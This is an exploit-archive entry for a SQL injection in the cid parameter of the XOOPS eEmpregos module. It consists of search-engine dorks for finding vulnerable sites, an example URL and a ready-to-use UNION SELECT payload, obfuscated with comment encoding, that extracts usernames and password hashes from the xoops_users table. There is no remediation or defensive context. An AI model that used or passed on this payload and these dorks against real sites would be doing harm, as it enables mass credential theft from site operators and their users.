id: 2668
date: 02/19/2008
title: XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===============================================================
XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability
===============================================================


##############################################################
#
# XOOPS Module eEmpregos SQL Injection(cid)
#
################################################################
#
# DORK 1 : allinurl: "modules/eEmpregos/index.php"
#
# DORK 2 : allinurl: cid "modules/eEmpregos"
#
################################################################
example

http://xxxx/modules/eEmpregos/index.php?pa=view&cid=[exploit]


EXPLOIT :

-00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202




#  0day.today [2023-03-26]  #